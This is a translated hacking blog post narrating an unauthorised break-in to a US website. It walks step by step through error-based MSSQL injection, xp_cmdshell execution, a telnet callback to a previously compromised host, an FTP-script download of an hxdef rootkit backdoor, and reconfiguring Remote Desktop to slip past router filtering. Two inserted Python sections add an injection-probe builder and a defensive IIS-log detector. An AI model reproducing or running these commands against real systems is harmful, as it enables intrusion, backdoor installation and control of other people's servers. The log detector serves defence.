A record of one intrusion into a US website

xiaoxiao  2021-03-06

Penetrating a US website through SQL injection

Author: rover [play8.net]

I've read a lot of injection articles these days and my blood is boiling ~ time to find a site to try it on ~ not a Chinese one; not out of patriotism, I just can't afford the trouble ~~~~

The most basic requirement for injection is an injection point ~ where do you find so many of them? I thought of Google.

I searched for the very classic injection-point suffix .asp?id=8 with "Search all web pages" selected. Ha, a big pile of English pages.

Test a point by hand ~

http://xxx.com/list.asp?id=8'

If the single quote is filtered, the normal page comes back ~

After going through a lot of sites, I finally found the legendary injection point.

http://www.sssd.com/program_detail.asp?id=8'

Error Type:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.

OK ~ this very likely means it can be injected, and it's MSSQL, which I like.

Tried:

http://www.sssd.com/program_detail.asp?id=8 and 0<>(select @@version)--

This gets the target's operating system and SQL Server version: comparing the string @@version with the int 0 forces a conversion error, and SQL Server echoes the offending value back in the error message.

Returns:

Error Type:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.

/Program_Detail.asp, Line 15

Well, it's NT 5.0 SP4, and it's kept up pretty well ~ the Americans really are on the ball.

Now check whether the SQL account the page uses has dbo privileges; if so, we can probably use xp_cmdshell to execute system commands.

http://www.ssd.com/program_detail.asp?id=8 and user_name()='dbo'

Returns the normal page ~ hoho ~~ so the target's SQL Server account has dbo privileges.
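As an added illustration (not part of rover's write-up), the following Python turns the three probes above into a small offline error-based oracle: it builds the `and 0<>(select ...)--` and `and <condition>` payloads, classifies a response body as the normal page, the unclosed-quote error or a type-conversion leak, and parses a leaked @@version banner into fields. The target URL and the three response bodies are constructed for the example, modelled on the errors quoted above; nothing is sent over the network.

```python
import re
from urllib.parse import quote

# Added example: offline helpers for the error-based probes shown in the write-up.
# The sample bodies below are constructed, modelled on the errors quoted above.

# SQL Server's int-conversion error echoes the offending string value back.
LEAK_RE = re.compile(
    r"Syntax error converting the \w+ value '(?P<value>.*?)' to a column of data type int",
    re.IGNORECASE | re.DOTALL,
)
# The error a bare trailing single quote produces.
QUOTE_RE = re.compile(r"Unclosed quotation mark before the character string", re.IGNORECASE)
# Fields of interest inside an @@version banner.
VERSION_RE = re.compile(
    r"Microsoft SQL Server (?P<product>\d{4}) - (?P<build>[\d.]+).*?"
    r"on Windows NT (?P<nt>[\d.]+) \(Build (?P<ntbuild>\d+): (?P<sp>Service Pack \d+)\)",
    re.IGNORECASE | re.DOTALL,
)


def build_leak_probe(url, expr):
    """Append ``and 0<>(select EXPR)--`` to a numeric id parameter.

    Comparing a string-valued EXPR with the int 0 forces a conversion error,
    and the error message carries the value of EXPR (e.g. @@version)."""
    return url + quote(f" and 0<>(select {expr})--", safe="()<>@=")


def build_bool_probe(url, condition):
    """Append ``and CONDITION`` for a true/false oracle: the normal page means
    true, an error or empty page means false (the user_name()='dbo' check)."""
    return url + quote(f" and {condition}", safe="()<>@='")


def classify(body):
    """Classify one response body as ('leak', value), ('quote_error', None)
    or ('normal', None)."""
    m = LEAK_RE.search(body)
    if m:
        return "leak", m.group("value").strip()
    if QUOTE_RE.search(body):
        return "quote_error", None
    return "normal", None


def parse_version_banner(banner):
    """Extract product year, build, NT version, NT build and service pack
    from a leaked @@version string; None if it does not look like one."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    return {k: m.group(k) for k in ("product", "build", "nt", "ntbuild", "sp")}


# Constructed sample responses (not captured from any real host).
SAMPLE_NORMAL = "<html><body><h1>Program 8</h1><p>Detail page rendered normally.</p></body></html>"
SAMPLE_QUOTE_ERROR = (
    "Error Type:\nMicrosoft OLE DB Provider for ODBC Drivers (0x80040E14)\n"
    "[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark "
    "before the character string ''."
)
SAMPLE_VERSION_LEAK = (
    "Error Type:\nMicrosoft OLE DB Provider for ODBC Drivers (0x80040E07)\n"
    "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the "
    "nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 "
    "14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on "
    "Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.\n"
    "/Program_Detail.asp, Line 15"
)

if __name__ == "__main__":
    base = "http://www.example.com/program_detail.asp?id=8"  # hypothetical target
    print(build_leak_probe(base, "@@version"))
    print(build_bool_probe(base, "user_name()='dbo'"))
    for body in (SAMPLE_NORMAL, SAMPLE_QUOTE_ERROR, SAMPLE_VERSION_LEAK):
        kind, value = classify(body)
        print(kind, parse_version_banner(value) if value else "")
```

The same `classify` call serves both probe styles: for the leak probe the interesting output is the captured value, for the boolean probe only whether the result is `normal` or not. Any scalar expression can replace `@@version` in `build_leak_probe`, which is how the technique generalises beyond the version check.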

Next, get system privileges ~

The usual worn-out method now would be to get the physical path of the web root and then upload a webshell ~

But I still wanted to see another way of getting the path.

I found a snippet in 13K that is said to be universal path-reading code:

http://www.sssd.com/program_detail.asp?id=8;create table [dbo].[13K] ([fuck] [char](255));--

http://www.sssd.com/program_detail.asp?id=8;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result OUTPUT INSERT INTO 13K (@result);--

http://www.ssd.com/program_detail.asp?id=8 and (select top 1 fuck from 13K)=1

This code reads the target's web root out of the registry into a table, then leaks the path back by comparing the table's contents with an int. In the end it didn't succeed: the second statement errors out (as written, the INSERT has no VALUES clause).

Since that didn't work, change approach ~ check whether the target has removed the xp_cmdshell extended stored procedure.

Listen on port 99 on my zombie box (a host I had compromised earlier):

nc -l -vv -p 99

http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'telnet <zombie ip> 99';--

nc on my zombie box gets a connection, haha ~ so xp_cmdshell is still there.

http://www.ssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'net start tlntsvr';

Start the Telnet service ~

The normal page comes back ~ so our command probably succeeded.

I telnet to www.sssd.com and, damn, the system says it can't connect to port 23 on the remote host.

Depressing ~ it seems the target filters the port.

Since we can execute system commands, let's use the tried-and-true shell trick ~ haha ~

First set up a backdoor. I use hxdef100 (it gets through firewalls, which I like). Configure it, write an install.cmd that installs it automatically, pack everything into a WinRAR self-extracting archive, and set the SFX to run install.cmd after extraction so it installs the backdoor.

http://www.sssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo open <ftpserver> <port> > t.t';--

http://www.ssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo <user> >> c:\t.t'

http://www.ssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo <pass> >> c:\t.t'

http://www.ssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo get rover.exe >> c:\t.

http://www.ssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'echo bye >> c:\t.t'

That writes the FTP script one line at a time ~ haha ~ then execute it:

http://www.ssd.com/program_detail.asp?id=8;exec master.dbo.xp_cmdshell 'ftp -s:t.t'

rover.exe is the configured backdoor. The normal page comes back, so the download very likely completed.
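On the defensive side, as an added example that is not part of the write-up: every step of the chain above leaves a distinctive query string in the IIS log, so the whole progression can be reconstructed from the log alone. The Python below parses a W3C-format IIS excerpt (constructed for this example, with documentation-range IP addresses), URL-decodes each query and tags it with the stage it belongs to: the bare-quote probe, the @@version leak, the user_name() privilege check, stacked xp_cmdshell or xp_regread execution, and the echo/ftp file drop.

```python
import re
from urllib.parse import unquote_plus

# Added example: tag IIS log entries with the stage of the injection chain.
# SAMPLE_LOG is constructed (not a real log); IPs are from documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2004-03-01 02:10:11
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-03-01 02:10:11 203.0.113.7 GET /program_detail.asp id=8 200
2004-03-01 02:10:19 203.0.113.7 GET /program_detail.asp id=8%27 500
2004-03-01 02:10:44 203.0.113.7 GET /program_detail.asp id=8%20and%200%3C%3E(select%20@@version)-- 500
2004-03-01 02:11:02 203.0.113.7 GET /program_detail.asp id=8%20and%20user_name()=%27dbo%27 200
2004-03-01 02:13:30 203.0.113.7 GET /program_detail.asp id=8;exec%20master.dbo.xp_cmdshell%20%27echo%20open%20198.51.100.5%2021%20%3E%20c:%5Ct.t%27;-- 200
2004-03-01 02:13:58 203.0.113.7 GET /program_detail.asp id=8;exec%20master.dbo.xp_cmdshell%20%27ftp%20-s:c:%5Ct.t%27;-- 200
2004-03-01 02:20:00 198.51.100.23 GET /program_detail.asp id=12 200
"""

# (stage name, pattern matched against the URL-decoded query string)
RULES = [
    ("quote_probe", re.compile(r"^\w+=\d+'\s*$")),
    ("version_leak", re.compile(r"@@version", re.IGNORECASE)),
    ("priv_check", re.compile(r"\buser_name\s*\(\s*\)", re.IGNORECASE)),
    ("stacked_exec", re.compile(r";\s*exec(?:ute)?\s+(?:master\.\.|master\.dbo\.)?xp_cmdshell\b", re.IGNORECASE)),
    ("registry_read", re.compile(r"\bxp_regread\b", re.IGNORECASE)),
    ("file_drop", re.compile(r"xp_cmdshell.*?'(?:echo\b.*?>|ftp\s+-s:|tftp\b)", re.IGNORECASE)),
]


def parse_iis_log(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("data line before #Fields header")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; skip rather than misalign columns
        yield dict(zip(fields, parts))


def tag_query(query):
    """Return the stage names whose pattern matches the decoded query."""
    decoded = unquote_plus(query)
    return [name for name, rx in RULES if rx.search(decoded)]


def detect(text):
    """Return a finding for every request whose query matches at least one rule."""
    findings = []
    for rec in parse_iis_log(text):
        tags = tag_query(rec.get("cs-uri-query", ""))
        if tags:
            findings.append({
                "time": f"{rec['date']} {rec['time']}",
                "ip": rec["c-ip"],
                "stem": rec["cs-uri-stem"],
                "status": rec["sc-status"],
                "tags": tags,
            })
    return findings


def attack_chains(findings):
    """Group findings by client IP, preserving log order, so the recon ->
    privilege check -> command execution progression is visible per source."""
    chains = {}
    for f in findings:
        chains.setdefault(f["ip"], []).append(f["tags"])
    return chains


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], ",".join(f["tags"]))
    for ip, stages in attack_chains(detect(SAMPLE_LOG)).items():
        print(ip, "->", " > ".join("+".join(s) for s in stages))
```

Matching runs on the decoded query so `%27`, `%20` and `+` encodings do not evade the rules, and the status column is kept because the 500s on the two error-based probes followed by 200s on the stacked queries is exactly the pattern this write-up produces.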

Run the backdoor ~

http://www.ssd.com/program_detail.asp?id=8;

Now connect with the hxdef client on port 80, enter the password, hoho ~~~ a shell appears ~~

Admin privileges. net start shows the remote host has Terminal Services running. I upload TerminalPort.exe (a small tool for viewing and changing the Terminal Services port) and find the port is 3389.

telnet www.sssd.com 3389 says it can't connect. NND, filtered ~ god ~~

At the time I guessed it was a problem with something on the target host itself. I upload pskill and fport.exe and kill the suspicious processes ~ telnet to 3389 still fails ~ then I see the host has the WinVNC remote-control software on it, presumably what the administrator uses to manage it. telnet www.sssd.com 5800 and, damn, it connects ~~ The administrator is a real oddball: a perfectly good Terminal Services is unreachable, but VNC is. Faint ~~

pskill winvnc

Kill the WinVNC process, then delete the WinVNC service files ~ damn, let's see you start now ~

Finally:

TerminalPort 5800

Change the Terminal Services port to 5800 and restart the system ~~

After two minutes I connect with the terminal client to www.sssd.com:5800 ~ success ~ hoho ~~~

After connecting I find this host has no firewall at all and no IPSec policy ~ the port filtering is done entirely on the router, NND.

There's nothing technical in this article ~ just a way of thinking ~ I hope it's of some use to you.

Please credit the original address when reposting: https://www.9cbs.com/read-95165.html
